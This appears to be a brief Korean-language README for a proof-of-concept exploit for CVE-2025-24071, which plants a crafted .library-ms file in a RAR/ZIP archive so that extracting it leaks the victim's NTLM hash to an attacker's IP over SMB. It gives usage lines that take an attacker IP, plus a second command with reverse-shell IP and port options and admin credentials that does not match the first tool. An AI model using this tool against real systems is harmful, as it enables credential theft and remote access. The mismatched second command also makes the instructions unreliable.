
CVE-2025-24071에 대한 개념 증명으로, RAR/ZIP 아카이브의 조작된 .library-ms 파일을 통해 NTLM 해시 누출을 시연하고 추출 시 SMB 인증을 트리거합니다.
CVE-2025-24071: RAR/ZIP 압축 해제 및 .library-ms 파일을 통한 NTLM 해시 유출
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888